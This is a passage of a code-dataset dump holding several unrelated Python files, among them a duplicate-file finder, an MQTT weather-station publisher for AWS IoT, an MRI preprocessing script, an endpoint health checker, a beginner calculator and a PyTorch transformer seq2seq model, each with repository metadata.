__init__(self, name, path):\r\n self.name = name\r\n self.path = path\r\n self.size = self.directory_size(path) # calculate and save the size of the directory on instantiation\r\n\r\n# define a class that will hold the duplicate file text-blocks and the size of the\r\n# duplicate files (for the -s flag)\r\nclass Block:\r\n def __init__(self, block, size):\r\n self.block = block\r\n self.size = size\r\n\r\n# use argparse to declare what kind of an input is acceptable\r\nap = argparse.ArgumentParser()\r\ngroup1 = ap.add_mutually_exclusive_group()\r\ngroup1.add_argument(\"-f\", action=\"store_true\")\r\ngroup1.add_argument(\"-d\", action=\"store_true\")\r\ngroup2 = ap.add_mutually_exclusive_group()\r\ngroup2.add_argument(\"-c\", action=\"store_true\")\r\ngroup2.add_argument(\"-n\", action=\"store_true\")\r\ngroup2.add_argument(\"-cn\", action=\"store_true\")\r\nap.add_argument(\"-s\", action=\"store_true\")\r\nap.add_argument(\"dirs\", nargs=\"*\")\r\n\r\n# parse the given commandline arguments and set the defaults if needed\r\nargs = ap.parse_args()\r\nif not args.f and not args.d:\r\n args.f = True\r\nif not args.c and not args.n and not args.cn:\r\n args.c = True\r\n\r\n# the directories given in the commandline\r\nd = args.dirs\r\n\r\n# containers for all the files and directories\r\nallfiles = []\r\nalldirs = []\r\n\r\n# if no directory is given, use the current working directory\r\nif not d:\r\n d.append(os.getcwd())\r\n\r\n# turn all possible relative paths into absolute paths\r\nfor i in range(len(d)):\r\n if not os.path.isabs(d[i]):\r\n d[i] = os.path.abspath(d[i])\r\n\r\n# get all of the files and subdirectories in the given directories, create according File\r\n# and Directory objects from them and place those objects in their respective containers\r\nfor entry in d:\r\n for root, dirs, files in os.walk(entry):\r\n for x in dirs:\r\n fullpath = os.path.join(root, x)\r\n newdir = Directory(x, fullpath)\r\n alldirs.append(newdir)\r\n for f in files:\r\n fullpath = os.path.join(root, f)\r\n allfiles.append(File(f, fullpath, os.stat(fullpath).st_size))\r\n\r\n# a dictionary where the keys are sha256 hashes and the values are File or Directory objects\r\nhashed_elems = defaultdict(list)\r\n\r\n# if -f flag is present\r\nif args.f:\r\n # for each file, read the contents, hash it using sha256 and map it to the dictionary\r\n if args.c:\r\n for curfile in allfiles:\r\n with open(curfile.path, \"rb\") as readfile:\r\n byts = readfile.read()\r\n hsh = hashlib.sha256(byts).hexdigest()\r\n hashed_elems[hsh].append(curfile)\r\n # for each file, hash the name of the file using sha256 and map it to the dictionary\r\n elif args.n:\r\n for curfile in allfiles:\r\n hashed_elems[curfile.name].append(curfile)\r\n # for each file, read the contents, add the name of the file to the end of the contents, then hash it \r\n # and map it to the dictionary\r\n elif args.cn:\r\n for curfile in allfiles:\r\n with open(curfile.path, \"rb\") as readfile:\r\n byts = readfile.read() + curfile.name.encode(\"utf-8\")\r\n hsh = hashlib.sha256(byts).hexdigest()\r\n hashed_elems[hsh].append(curfile)\r\n\r\n# a function which will get a hash for a given directory\r\ndef hash_directory(direc_path):\r\n # if the directory is empty, it gets the hash for the empty string\r\n if not os.listdir(direc_path):\r\n return hashlib.sha256(\"\".encode(\"utf-8\")).hexdigest()\r\n # container which will hold the hashes of all the files and subdirectories\r\n sub_hashes = []\r\n # relative paths of the contents of the directory\r\n subs = os.listdir(direc_path)\r\n # full paths of the contents of the directory, fill it using the path of the root\r\n subs_full = [\"\"] * len(subs)\r\n for i in range(len(subs)):\r\n subs_full[i] = os.path.join(direc_path, subs[i])\r\n # for each element, hash the contents and the name and add it to the sub_hashes list\r\n for i in range(len(subs_full)):\r\n # if the current element is a file, hash it as if -f -cn flags are given\r\n if os.path.isfile(subs_full[i]):\r\n with open(subs_full[i], \"rb\") as readfile:\r\n byts = readfile.read()\r\n hsh = hashlib.sha256(byts).hexdigest()\r\n sub_hashes.append(hsh)\r\n # if the current element is a directory, call the hash_directory function to hash it\r\n if os.path.isdir(subs_full[i]):\r\n sub_hashes.append(hash_directory(subs_full[i]))\r\n # sort the sub_hashes list alphabetically, turn it into a string, then hash it to get the \r\n # directory's hash\r\n sub_hashes.sort()\r\n string = \"\"\r\n for h in sub_hashes:\r\n string += h\r\n return hashlib.sha256(string.encode(\"utf-8\")).hexdigest()\r\n\r\n# if -d flag is present\r\nif args.d:\r\n if args.c:\r\n # hash the directories using the hash_directory function and map them to the dictionary\r\n for curdir in alldirs:\r\n hsh = hash_directory(curdir.path)\r\n hashed_elems[hsh].append(curdir)\r\n elif args.n:\r\n # hash the directories by their names and map them to the dictionary\r\n for curdir in alldirs:\r\n hsh0 = hash_directory(curdir.path)\r\n hsh1 = hashlib.sha256(curdir.name.encode(\"utf-8\")).hexdigest()\r\n string = hsh0 + hsh1\r\n hsh = hashlib.sha256(string.encode(\"utf-8\")).hexdigest()\r\n hashed_elems[hsh].append(curdir)\r\n elif args.cn:\r\n for curdir in alldirs:\r\n # hash the directories by hash_directory, then concatenate the name of the directory to\r\n # the end of the first hash, then take another hash. finally, map them to the dictionary\r\n hsha = hash_directory(curdir.path)\r\n hsh1 = hashlib.sha256(curdir.name.encode(\"utf-8\")).hexdigest()\r\n string = hsha + hsh1\r\n hshb = hashlib.sha256(string.encode(\"utf-8\")).hexdigest()\r\n hsh = hashlib.sha256((hsha + hshb).encode()).hexdigest()\r\n hashed_elems[hsh].append(curdir)\r\n\r\n# printer portion of the code. check all hashed elements and see if there are some\r\n# who are mapped to the same hash keys, meaning duplicate files/directories\r\nblocks = []\r\nfor k, v in hashed_elems.items():\r\n # same hash for multiple files/directories\r\n if len(v) > 1:\r\n v.sort(key = lambda x: x.path)\r\n block = \"\"\r\n lastsize = -1\r\n for f in v:\r\n # if -s flag is present and -n flag is not, need to print \\t and size of the file/directory\r\n if args.s and not args.n:\r\n block += f.path + \"\\t\" + \"%d\" % f.size + \"\\n\"\r\n else:\r\n block += f.path + \"\\n\"\r\n lastsize = f.size\r\n # put all of the text blocks in a list of blocks\r\n blocks.append(Block(block, lastsize))\r\n# if -s is present, sort the blocks by size\r\nif args.s and not args.n:\r\n blocks.sort(key = lambda x: x.size, reverse = True)\r\n# otherwise, sort them alphabetically\r\nelse: \r\n blocks.sort(key = lambda x: x.block)\r\n# finally, print all of the blocks to the output stream\r\nfor ele in blocks:\r\n print(ele.block)","repo_name":"ege-kaya/duplicate-file-finder","sub_path":"identic.py","file_name":"identic.py","file_ext":"py","file_size_in_byte":8184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71975203626","text":"import Adafruit_DHT\nimport ssl\nimport sys\nimport paho.mqtt.client as mqtt\nimport time\n\nsensor = Adafruit_DHT.DHT22\npin = 21 # GPIO 21\ndelaySecondsBetweenPublish = 1\n\nmqttCert_Protocol = ssl.PROTOCOL_TLSv1_2\nmqttTopic_pub = \"$aws/things/kayspi-weatherStation/shadow/update\"\nmqttTopic_sub = \"$aws/things/kayspi-weatherStation/shadow/update/rejected\"\nmqttCert_ca = \"./cert/VeriSign-Class-3-Public-Primary-Certification-Authority-G5.pem\"\nmqttCert = \"./cert/kayspi-weatherStation/de6f9196d1-certificate.pem.crt\"\nmqttCert_priv = \"./cert/kayspi-weatherStation/de6f9196d1-private.pem.key\"\nmqttClientId = \"kayspi-weatherStation\"\nmqttEndpoint = \"A1B71MLXKNXXXX.iot.us-east-1.amazonaws.com\"\nmqttPort = 8883\n\ndef on_connect(mqttc, obj, flags, rc):\n if rc == 0:\n print(\"Client conntected : \" + str(rc) + \" | Connection status: successful.\")\n mqttClient.subscribe(mqttTopic_sub, qos=0)\n publish_data()\n\ndef publish_data():\n #time.sleep(delaySecondsBetweenPublish)\n humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n if humidity is not None and temperature is not None:\n payload = '{{\"state\":{{\"reported\":{{\"humidity\":{0:0.1f},\"temperature\":{1:0.1f}}}}}}}' \\\n .format(humidity,temperature)\n print(\"Publish {0}\".format(payload))\n mqttClient.publish(mqttTopic_pub, payload, 0, False)\n\ndef on_disconnect(client, userdata, rc):\n print(\"Client connection closed.\")\n\ndef on_log(pahoClient, obj, level, string):\n print(\"---------------\")\n print(string)\n\ndef on_publish(mosq, obj, mid):\n print(\"mid: \" + str(mid))\n publish_data()\n\ndef teardown():\n mqttClient.disconnect()\n mqttClient.loop_stop()\n sys.exit()\n\nmqttClient = mqtt.Client(client_id=mqttClientId)\nmqttClient.on_connect = on_connect\nmqttClient.on_disconnect = on_disconnect\nmqttClient.on_publish = on_publish\nmqttClient.on_log = on_log\n\nmqttClient.tls_set(mqttCert_ca, certfile=mqttCert, keyfile=mqttCert_priv, tls_version=mqttCert_Protocol, ciphers=None)\n\nprint(\"Start connecting to \" + mqttEndpoint + \":\" + str(mqttPort) + \" ...\")\n\ntry:\n mqttClient.connect(mqttEndpoint, port=mqttPort)\n mqttClient.loop_forever()\nexcept (KeyboardInterrupt, SystemExit):\n teardown()","repo_name":"KayLerch/alexa-hello-smarthome-skill","sub_path":"things/kayspi-weatherStation.py","file_name":"kayspi-weatherStation.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33329805662","text":"\"\"\"\n\ntakes all the preprocessed files for a given domain and collates them into one numpy array file.\nThis way an entire dataset can be loaded into memory and retained, much less file IO during training.\n\n\"\"\"\nimport sys\n\nimport numpy as np\nsys.path.append(\"../../\")\nfrom twaidata.torchdatasets.whole_brain_dataset import MRISegmentationDatasetFromFile\nimport torch\nimport os\nfrom pathlib import Path\nfrom trustworthai.utils.augmentation.standard_transforms import NormalizeImg, PairedCompose, LabelSelect, PairedCentreCrop, CropZDim\nimport argparse\n\ndef construct_parser():\n # preprocessing settings\n parser = argparse.ArgumentParser(description = \"MRI nii.gz simple preprocessing pipeline\")\n \n parser.add_argument('-i', '--in_dir', required=True, help='Path of the stage 1 preprocessed data input folder')\n parser.add_argument('-o', '--out_dir', required=True, help='Path of the stage 2 preprocessed data output folder')\n parser.add_argument('-n', '--name', required=True, help='Name of dataset to be processed')\n parser.add_argument('-d', '--domain', required=False, default=None, help=\"Subdomain of the dataset to be processed. If None, will search for data directly in in_dir/dataset_name\")\n parser.add_argument('-H', '--crop_height', required=True, default=224, type=int, help=\"height of the centre crop of the image\")\n parser.add_argument('-W', '--crop_width', required=True, default=160, type=int, help=\"width of the centre crop of the image\")\n parser.add_argument('-l', '--label_extract', required=False, default=None, type=int, help=\"specfic id in the label map to extract (e.g 1 is WMH, 2 is other pathology in the WMH challenge dataset. if set, only the given label will be extracted, otherwise the label will be left as is). optional\")\n\n return parser\n\n\ndef main(args):\n # extract args\n in_dir = args.in_dir\n out_dir = args.out_dir\n name = args.name\n domain = args.domain\n crop_height = args.crop_height\n crop_width = args.crop_width\n label_extract = args.label_extract\n \n # check file paths are okay\n in_dir = os.path.join(in_dir, name)\n out_dir = os.path.join(out_dir, name)\n if domain != None:\n in_dir = os.path.join(in_dir, domain)\n out_dir = os.path.join(out_dir, domain)\n \n if not os.path.exists(in_dir):\n raise ValueError(f\"could not find folder: {in_dir}\")\n \n print(f\"processing dataset: {in_dir}\")\n \n if not os.path.exists(out_dir):\n try:\n Path(out_dir).mkdir(parents=True, exist_ok=True)\n except FileNotFoundError:\n print(f\"Warning: couldn't make output directory here: {out_dir}\")\n \n \n # select centre crop and optionaly label extract transform\n crop_size = (crop_height, crop_width)\n transforms = get_transforms(crop_size, label_extract)\n \n \n # load the dataset\n dataset = MRISegmentationDatasetFromFile(\n in_dir, \n img_filetypes=[\"FLAIR_BET_mask.nii.gz\", \"FLAIR.nii.gz\", \"T1.nii.gz\"], # brain mask, flair, T1.\n label_filetype=\"wmh.nii.gz\",\n transforms=transforms\n )\n\n # collect the images and labels in to a list\n data_imgs = []\n data_labels = []\n slices = [] # check for inconsistent slice sizes across a domain\n for (img, label) in dataset:\n data_imgs.append(img)\n data_labels.append(label)\n slices.append(img.shape[1])\n \n # where there is more than one slice size in the domain\n # take a centre crop of the sizes equal to the miniumum\n # number of slices found in the domain.\n # should not affect the WMH challenge data, only the ED inhouse data.\n slices = np.array(slices)\n uniques = np.unique(slices)\n if len(uniques) > 1:\n print(f\"unique slice sizes found in domain: {uniques}\")\n # for each image select the centre minimum slice\n centre_cut = np.min(slices)\n for i in range(len(data_imgs)):\n if centre_cut < data_imgs[i].shape[1]: # crop images larger than the biggest slice size.\n start = (data_imgs[i].shape[1] - centre_cut) // 2\n data_imgs[i] = data_imgs[i][:,start:start+centre_cut,:,:]\n data_labels[i] = data_labels[i][:,start:start+centre_cut,:,:]\n \n # convert to numpy arrays\n data_imgs = np.stack(data_imgs, axis=0)\n data_labels = np.stack(data_labels, axis=0)\n print(f\"dataset imgs shape: {data_imgs.shape}\") \n print(f\"dataset labels shape: {data_labels.shape}\") \n\n # save the files\n out_file_imgs = os.path.join(out_dir, \"imgs.npy\")\n out_file_labels = os.path.join(out_dir, \"labels.npy\")\n np.save(out_file_imgs, data_imgs)\n np.save(out_file_labels, data_labels)\n\n \ndef get_transforms(crop_size, label_extract):\n if label_extract == None:\n print(\"keeping all labels\")\n return PairedCentreCrop(crop_size)\n else:\n print(f\"extracting label {label_extract}\")\n transforms = PairedCompose([\n PairedCentreCrop(crop_size), # cut out the centre square\n LabelSelect(label_extract), # extract the desired label\n ])\n return transforms\n\nif __name__ == '__main__':\n parser = construct_parser()\n args = parser.parse_args()\n main(args)\n\n","repo_name":"JingyuSunUOE/WMH_Challenge","sub_path":"twaidata/FileCollation_preprep/preprocess_file_collation.py","file_name":"preprocess_file_collation.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71376839147","text":"import yaml\nimport requests\nimport time\n\ndef check_health(endpoints):\n availability = {}\n\n for endpoint in endpoints:\n name = endpoint['name']\n url = endpoint['url']\n availability[name] = {'up_count': 0, 'total_count': 0}\n\n while True:\n for endpoint in endpoints:\n name = endpoint['name']\n url = endpoint['url']\n method = endpoint.get('method', 'GET')\n headers = endpoint.get('headers', {})\n body = endpoint.get('body')\n\n start_time = time.time()\n response = requests.request(method, url, headers=headers, json=body)\n end_time = time.time()\n\n response_time = (end_time - start_time) * 1000 # Convert to milliseconds\n\n if response.ok and response_time < 500:\n availability[name]['up_count'] += 1\n\n availability[name]['total_count'] += 1\n\n print_availability(availability)\n time.sleep(15)\n\ndef print_availability(availability):\n for name, stats in availability.items():\n percentage = (stats['up_count'] / stats['total_count']) * 100\n print(f\"{name} has {percentage}% availability percentage\")\n\nif __name__ == \"__main__\":\n file_path = input(\"Enter the path to the YAML file: \")\n\n with open(file_path, 'r') as f:\n endpoints = yaml.safe_load(f)\n\n check_health(endpoints)\n\n","repo_name":"madhavisringarapu/Fetch-Test","sub_path":"availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1652933189","text":"#!/usr/bin/env python3\n\n# print(\"Kalkulačka1\\n\")\n# první_číslo = int(input(\"Zadejte první číslo: \"))\n# druhé_číslo = int(input(\"Zadejte druhé číslo: \"))\n# print(\"Jejich součet je:\", první_číslo + druhé_číslo)\n# print(\"Jejich rozdíl je:\", první_číslo - druhé_číslo)\n# print(\"Jejich součin je:\", první_číslo * druhé_číslo)\n# print(\"Jejich podíl je:\", první_číslo / druhé_číslo)\n# input(\"\\nStiskněte libovolnou klávesu...\")\n\n\n# print(\"Kalkulačka2\\n\")\n# prvni_cislo = int(input(\"Zadejte první číslo: \"))\n# druhe_cislo = int(input(\"Zadejte druhé číslo: \"))\n# print(\"1 - sčítání\")\n# print(\"2 - odčítání\")\n# print(\"3 - násobení\")\n# print(\"4 - dělení\")\n# cislo_operace = int(input(\"Zadejte číslo operace: \"))\n# if cislo_operace == 1:\n# print(\"Jejich součet je:\", prvni_cislo + druhe_cislo)\n# elif cislo_operace == 2:\n# print(\"Jejich rozdíl je:\", prvni_cislo - druhe_cislo)\n# elif cislo_operace == 3:\n# print(\"Jejich součin je:\", prvni_cislo * druhe_cislo)\n# elif cislo_operace == 4:\n# print(\"Jejich podíl je:\", prvni_cislo / druhe_cislo)\n# else:\n# print(\"Neplatná volba!\")\n# input(\"\\nStiskněte libovolnou klávesu...\")\n\n\nprint(\"Kalkulačka3\\n\")\npokracovat = True\nwhile pokracovat:\n prvni_cislo = int(input(\"Zadejte první číslo: \"))\n druhe_cislo = int(input(\"Zadejte druhé číslo: \"))\n print(\"1 - sčítání\")\n print(\"2 - odčítání\")\n print(\"3 - násobení\")\n print(\"4 - dělení\")\n print(\"5 - umocňování\")\n cislo_operace = int(input(\"Zadejte číslo operace: \"))\n if cislo_operace == 1:\n print(\"Jejich součet je:\", prvni_cislo + druhe_cislo)\n elif cislo_operace == 2:\n print(\"Jejich rozdíl je:\", prvni_cislo - druhe_cislo)\n elif cislo_operace == 3:\n print(\"Jejich součin je:\", prvni_cislo * druhe_cislo)\n elif cislo_operace == 4:\n print(\"Jejich podíl je:\", prvni_cislo / druhe_cislo)\n elif cislo_operace == 5:\n print(prvni_cislo, \"na\", druhe_cislo, \"je:\", prvni_cislo ** druhe_cislo)\n else:\n print(\"Neplatná volba!\")\n nezadano = True\n while nezadano:\n odpoved = input(\"\\nPřejete si zadat další příklad? y / n: \")\n if odpoved == \"y\" or odpoved == \"Y\":\n nezadano = False\n elif odpoved == \"n\" or odpoved == \"N\":\n nezadano = False\n pokracovat = False\n else:\n pass\ninput(\"\\nStiskněte libovolnou klávesu...\")","repo_name":"Miky9/Py-BasicSyntax","sub_path":"ITN/3_Kalkulacka.py","file_name":"3_Kalkulacka.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17514510114","text":"DATABASE_NAME = '17K_PDB_three_sequences.db'\n\nimport input_files as input_data\n\nimport sqlite3\nconn = sqlite3.connect(DATABASE_NAME)\n\nc = conn.cursor()\n\nc.execute(\"DROP TABLE IF EXISTS sequences\")\nc.execute('''CREATE TABLE sequences (seq text,\n acid_a text, acid_b text, acid_c text,\n acid_a_phi real, acid_a_psi real,\n acid_b_phi real, acid_b_psi real,\n acid_c_phi real, acid_c_psi real)''')\n\ndef parse_rama_file(RAMA_NAME):\n \n sequence_data = []\n sql_input_data = []\n\n with open('output_big/' + RAMA_NAME) as f:\n \tsequence_data = f.readlines()\n\n sequence = sequence_data[1:] #first line is column data\n\n number_acids = len(sequence)\n\n i = 2 #throw away the first and last amino acid\n while i int:\n NSL = []\n NSR = []\n stack = []\n for i in range(len(arr)):\n while len(stack) > 0 and stack[-1][0] >= arr[i]:\n stack.pop()\n if len(stack) == 0:\n NSL.append(-1)\n else:\n NSL.append(stack[-1][1])\n stack.append((arr[i], i))\n stack = []\n for i in range(len(arr) - 1, -1, -1):\n while len(stack) > 0 and stack[-1][0] > arr[i]:\n stack.pop()\n if len(stack) == 0:\n NSR.append(len(arr))\n else:\n NSR.append(stack[-1][1])\n stack.append((arr[i], i))\n NSR = NSR[::-1]\n s = 0\n for i in range(len(arr)):\n a = i - NSL[i]\n b = NSR[i] - i\n s += a * b * arr[i]\n return s % 1000000007","repo_name":"NirajPatel07/Leetcode-Problems","sub_path":"0907-sum-of-subarray-minimums/0907-sum-of-subarray-minimums.py","file_name":"0907-sum-of-subarray-minimums.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7610492486","text":"import os\nfrom imblearn.under_sampling import TomekLinks\n\n\nclass Sampling(object):\n def __init__(self, sampler):\n self.sampler = sampler\n self.random_seed = 101\n self.njobs = os.cpu_count()\n\n def get_sampler(self):\n sampler = None\n\n if self.sampler == 'tomek-links':\n sampler = TomekLinks(random_state=self.random_seed, n_jobs=self.njobs)\n\n return sampler\n","repo_name":"studiawan/pylogsentiment","sub_path":"pylogsentiment/imbalance/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"5523566189","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchtext\nfrom torchtext.data import Field, BucketIterator, Iterator, TabularDataset\n\nfrom bpemb import BPEmb\nimport numpy as np\n\nimport random\nimport math\nimport time\n\n\nSEED = 1234\n\nrandom.seed(SEED)\nnp.random.seed(SEED)\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\n\nbpemb = BPEmb(lang=\"ru\", vs=50000)\n\nfield = Field(tokenize = lambda line: bpemb.encode(line.strip('\\n')), \n init_token = '', \n eos_token = '', \n lower = True, \n batch_first = True)\n\ndata = TabularDataset(path='train.сsv',\n format='csv', fields=[('original', field), ('paraphrase', field)])\ntest_data, train_data = data.split(split_ratio=0.05)\n\nfield.build_vocab(train_data, min_freq = 2)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nBATCH_SIZE = 256\n\ntrain_iterator, test_iterator = BucketIterator.splits((train_data, test_data), \n batch_size = BATCH_SIZE,\n sort=False,\n device=device)\n\nclass Encoder(nn.Module):\n def __init__(self, \n input_dim, \n hid_dim, \n n_layers, \n n_heads, \n pf_dim,\n dropout, \n device,\n max_length = 100):\n super().__init__()\n\n self.device = device\n \n self.tok_embedding = nn.Embedding(input_dim, hid_dim)\n self.pos_embedding = nn.Embedding(max_length, hid_dim)\n \n self.layers = nn.ModuleList([EncoderLayer(hid_dim, \n n_heads, \n pf_dim,\n dropout, \n device) \n for _ in range(n_layers)])\n \n self.dropout = nn.Dropout(dropout)\n \n self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)\n \n def forward(self, src, src_mask):\n \n #src = [batch size, src len]\n #src_mask = [batch size, src len]\n \n batch_size = src.shape[0]\n src_len = src.shape[1]\n \n pos = torch.arange(0, src_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)\n \n #pos = [batch size, src len]\n \n src = self.dropout((self.tok_embedding(src) * self.scale) + self.pos_embedding(pos))\n \n #src = [batch size, src len, hid dim]\n \n for layer in self.layers:\n src = layer(src, src_mask)\n \n #src = [batch size, src len, hid dim]\n \n return src\n\nclass EncoderLayer(nn.Module):\n def __init__(self, \n hid_dim, \n n_heads, \n pf_dim, \n dropout, \n device):\n super().__init__()\n \n self.layer_norm = nn.LayerNorm(hid_dim)\n self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)\n self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim, \n pf_dim, \n dropout)\n self.dropout = nn.Dropout(dropout)\n \n def forward(self, src, src_mask):\n \n #src = [batch size, src len, hid dim]\n #src_mask = [batch size, src len]\n \n #self attention\n _src, _ = self.self_attention(src, src, src, src_mask)\n \n #dropout, residual connection and layer norm\n src = self.layer_norm(src + self.dropout(_src))\n \n #src = [batch size, src len, hid dim]\n \n #positionwise feedforward\n _src = self.positionwise_feedforward(src)\n \n #dropout, residual and layer norm\n src = self.layer_norm(src + self.dropout(_src))\n \n #src = [batch size, src len, hid dim]\n \n return src\n\nclass MultiHeadAttentionLayer(nn.Module):\n def __init__(self, hid_dim, n_heads, dropout, device):\n super().__init__()\n \n assert hid_dim % n_heads == 0\n \n self.hid_dim = hid_dim\n self.n_heads = n_heads\n self.head_dim = hid_dim // n_heads\n \n self.fc_q = nn.Linear(hid_dim, hid_dim)\n self.fc_k = nn.Linear(hid_dim, hid_dim)\n self.fc_v = nn.Linear(hid_dim, hid_dim)\n \n self.fc_o = nn.Linear(hid_dim, hid_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n self.scale = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device)\n \n def forward(self, query, key, value, mask = None):\n \n batch_size = query.shape[0]\n \n #query = [batch size, query len, hid dim]\n #key = [batch size, key len, hid dim]\n #value = [batch size, value len, hid dim]\n \n Q = self.fc_q(query)\n K = self.fc_k(key)\n V = self.fc_v(value)\n \n #Q = [batch size, query len, hid dim]\n #K = [batch size, key len, hid dim]\n #V = [batch size, value len, hid dim]\n \n Q = Q.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)\n K = K.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)\n V = V.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)\n \n #Q = [batch size, n heads, query len, head dim]\n #K = [batch size, n heads, key len, head dim]\n #V = [batch size, n heads, value len, head dim]\n \n energy = torch.matmul(Q, K.permute(0, 1, 3, 2)) / self.scale\n \n #energy = [batch size, n heads, seq len, seq len]\n \n if mask is not None:\n energy = energy.masked_fill(mask == 0, -1e10)\n \n attention = torch.softmax(energy, dim = -1)\n \n #attention = [batch size, n heads, query len, key len]\n \n x = torch.matmul(self.dropout(attention), V)\n \n #x = [batch size, n heads, seq len, head dim]\n \n x = x.permute(0, 2, 1, 3).contiguous()\n \n #x = [batch size, seq len, n heads, head dim]\n \n x = x.view(batch_size, -1, self.hid_dim)\n \n #x = [batch size, seq len, hid dim]\n \n x = self.fc_o(x)\n \n #x = [batch size, seq len, hid dim]\n \n return x, attention\n\nclass PositionwiseFeedforwardLayer(nn.Module):\n def __init__(self, hid_dim, pf_dim, dropout):\n super().__init__()\n \n self.fc_1 = nn.Linear(hid_dim, pf_dim)\n self.fc_2 = nn.Linear(pf_dim, hid_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n def forward(self, x):\n \n #x = [batch size, seq len, hid dim]\n \n x = self.dropout(torch.relu(self.fc_1(x)))\n \n #x = [batch size, seq len, pf dim]\n \n x = self.fc_2(x)\n \n #x = [batch size, seq len, hid dim]\n \n return x\n\nclass Decoder(nn.Module):\n def __init__(self, \n output_dim, \n hid_dim, \n n_layers, \n n_heads, \n pf_dim, \n dropout, \n device,\n max_length = 100):\n super().__init__()\n \n self.device = device\n \n self.tok_embedding = nn.Embedding(output_dim, hid_dim)\n self.pos_embedding = nn.Embedding(max_length, hid_dim)\n \n self.layers = nn.ModuleList([DecoderLayer(hid_dim, \n n_heads, \n pf_dim, \n dropout, \n device)\n for _ in range(n_layers)])\n \n self.fc_out = nn.Linear(hid_dim, output_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)\n \n def forward(self, trg, enc_src, trg_mask, src_mask):\n \n #trg = [batch size, trg len]\n #enc_src = [batch size, src len, hid dim]\n #trg_mask = [batch size, trg len]\n #src_mask = [batch size, src len]\n \n batch_size = trg.shape[0]\n trg_len = trg.shape[1]\n \n pos = torch.arange(0, trg_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)\n \n #pos = [batch size, trg len]\n \n trg = self.dropout((self.tok_embedding(trg) * self.scale) + self.pos_embedding(pos))\n \n #trg = [batch size, trg len, hid dim]\n \n for layer in self.layers:\n trg, attention = layer(trg, enc_src, trg_mask, src_mask)\n \n #trg = [batch size, trg len, hid dim]\n #attention = [batch size, n heads, trg len, src len]\n \n output = self.fc_out(trg)\n \n #output = [batch size, trg len, output dim]\n \n return output, attention\n\nclass DecoderLayer(nn.Module):\n def __init__(self, \n hid_dim, \n n_heads, \n pf_dim, \n dropout, \n device):\n super().__init__()\n \n self.layer_norm = nn.LayerNorm(hid_dim)\n self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)\n self.encoder_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)\n self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim, \n pf_dim, \n dropout)\n self.dropout = nn.Dropout(dropout)\n \n def forward(self, trg, enc_src, trg_mask, src_mask):\n \n #trg = [batch size, trg len, hid dim]\n #enc_src = [batch size, src len, hid dim]\n #trg_mask = [batch size, trg len]\n #src_mask = [batch size, src len]\n \n #self attention\n _trg, _ = self.self_attention(trg, trg, trg, trg_mask)\n \n #dropout, residual connection and layer norm\n trg = self.layer_norm(trg + self.dropout(_trg))\n \n #trg = [batch size, trg len, hid dim]\n \n #encoder attention\n _trg, attention = self.encoder_attention(trg, enc_src, enc_src, src_mask)\n \n #dropout, residual connection and layer norm\n trg = self.layer_norm(trg + self.dropout(_trg))\n \n #trg = [batch size, trg len, hid dim]\n \n #positionwise feedforward\n _trg = self.positionwise_feedforward(trg)\n \n #dropout, residual and layer norm\n trg = self.layer_norm(trg + self.dropout(_trg))\n \n #trg = [batch size, trg len, hid dim]\n #attention = [batch size, n heads, trg len, src len]\n \n return trg, attention\n\nclass Seq2Seq(nn.Module):\n def __init__(self, \n encoder, \n decoder, \n src_pad_idx, \n trg_pad_idx, \n device):\n super().__init__()\n \n self.encoder = encoder\n self.decoder = decoder\n self.src_pad_idx = src_pad_idx\n self.trg_pad_idx = trg_pad_idx\n self.device = device\n \n def make_src_mask(self, src):\n \n #src = [batch size, src len]\n \n src_mask = (src != self.src_pad_idx).unsqueeze(1).unsqueeze(2)\n\n #src_mask = [batch size, 1, 1, src len]\n\n return src_mask\n \n def make_trg_mask(self, trg):\n \n #trg = [batch size, trg len]\n \n trg_pad_mask = (trg != self.trg_pad_idx).unsqueeze(1).unsqueeze(3)\n \n #trg_pad_mask = [batch size, 1, trg len, 1]\n \n trg_len = trg.shape[1]\n \n trg_sub_mask = torch.tril(torch.ones((trg_len, trg_len), device = self.device)).bool()\n \n #trg_sub_mask = [trg len, trg len]\n \n trg_mask = trg_pad_mask & trg_sub_mask\n \n #trg_mask = [batch size, 1, trg len, trg len]\n \n return trg_mask\n\n def forward(self, src, trg):\n \n #src = [batch size, src len]\n #trg = [batch size, trg len]\n \n src_mask = self.make_src_mask(src)\n trg_mask = self.make_trg_mask(trg)\n \n #src_mask = [batch 